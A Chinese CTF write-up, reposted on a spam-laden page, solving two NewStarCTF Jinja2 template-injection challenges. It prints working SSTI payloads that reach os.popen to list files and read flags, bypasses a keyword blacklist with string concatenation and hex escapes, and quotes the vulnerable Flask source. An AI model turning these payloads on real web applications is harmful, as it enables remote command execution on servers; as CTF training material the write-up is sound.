当前位置: 首页 > wzjs >正文

自己做家装设计网站aso关键词搜索优化

wzjs 2025/8/22 8:37:27
自己做家装设计网站,aso关键词搜索优化,页游传奇排行榜,网站标题主关键词[NewStarCTF 公开赛赛道]BabySSTI_One 测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用 可以考虑拼接或者编码,这里使用拼接 ?name{{()["__cla"~"ss__"]}}?name{{()["__cla"~"ss__"]["__ba&…

[NewStarCTF 公开赛赛道]BabySSTI_One

测试发现过滤关键字,但是特殊符号中括号、双引号、点都能用

可以考虑拼接或者编码,这里使用拼接


?name={{()["__cla"~"ss__"]}}



?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()}}

 直接命令执行


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ls")["read"]()}}


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("ca"~"t"~" "~"app*")["read"]()}}

from flask import Flask, request 
from jinja2 import Template 
import re 
app = Flask(__name__) 
@app.route("/") 
def index(): name = request.args.get('name', 'CTFer') if not re.findall('class|base|init|mro|flag|cat|more|env', name): t = Template("Welcome to NewStarCTF, Dear " + name + "Try to GET me a NAME") return t.render() else: t = Template("Get Out!Hacker!") return t.render() 
if __name__ == "__main__": app.run()

根目录下


?name={{()["__cla"~"ss__"]["__ba"~"se__"]["__subcl"~"asses__"]()[117]["__in"~"it__"]["__glob"~"als__"]["po"~"pen"]("tac /fla*")["read"]()}}

[NewStarCTF 公开赛赛道]BabySSTI_Two

burp测一下过滤哪些

过滤了这些内容,可用如下

尝试十六进制编码绕过


?name={{()['\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f']}}

 

 


#{{()['__class__']['__base__']['__subclasses__']()}}
{{()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()}}


name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('ls')['\x72\x65\x61\x64']()}}#    {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls')['read']()}}

 

 flag在根目录下


?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x6c\x73\x20\x2f')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('ls /')['read']()}}?name={{(()['__\x63\x6c\x61\x73\x73__']['__base__']['__\x73\x75\x62\x63\x6c\x61\x73\x73\x65\x73__']()[117])['__\x69\x6e\x69\x74__']['__\x67\x6c\x6f\x62\x61\x6c\x73__']['\x70\x6f\x70\x65\x6e']('\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x5f\x69\x6e\x5f\x68\x33\x72\x33\x5f\x35\x32\x64\x61\x61\x64')['\x72\x65\x61\x64']()}}# {{(()['__class__']['__base__']['__subclasses__']()[117])['__init__']['__globals__']['popen']('cat /flag_in_h3r3_52daad')['read']()}}

http://www.dtcms.com/wzjs/440196.html

相关文章:

  • 企业建设网站的目的和意义游戏优化大师官网
  • 镇江网站建设个企业网站制作公司
  • 做网站需要学会哪些友情链接交易购买
  • 直播网站建设1个节点多少钱百度百家官网入口
  • 锦州做网站哪家好宁波百度快照优化排名
  • 县志中关于政府网站建设的驾校推广网络营销方案
  • 上海环球金融中心简笔画企业网站seo诊断工具
  • 怎样保存网站资料做证据谷歌seo和百度区别
  • wordpress ip锁定插件seo同行网站
  • 网页设计的发展前景如何seo快速排名软件app
  • 作品集展示的网站关键词优化一年的收费标准
  • 政务性网站制作公司引流获客工具
  • 小城镇建设网站参考文献个人接广告的平台
  • 网站的文章参考文献怎么做百度的网址
  • 网站建设的毕业论文的系统测试个人自己免费建网站
  • wordpress 置顶 插件seo服务的内容
  • 青岛网站公司搜索
  • 合肥网站建站建设百度号码认证平台个人号码申诉
  • 学做网站论坛vip学员码百度一下百度
  • wordpress路径函数青岛seo排名公司
  • 蚂蜂窝网站源码郑州seo顾问培训
  • 学雷锋_做美德少年网站网站域名查询网
  • 莱芜亓家网站百度宣传推广
  • 东台网站建设江苏网站建站系统哪家好
  • 网站开发概述软文营销经典案例优秀软文
  • 商城网站建设招聘莆田seo推广公司
  • 石家庄新闻频道seo 优化技术难度大吗
  • 网站字体效果中国企业网络营销现状
  • 旅游商城网站模板免费下载中国疫情最新数据
  • 微信免费做邀请函模版网站网游百度搜索风云榜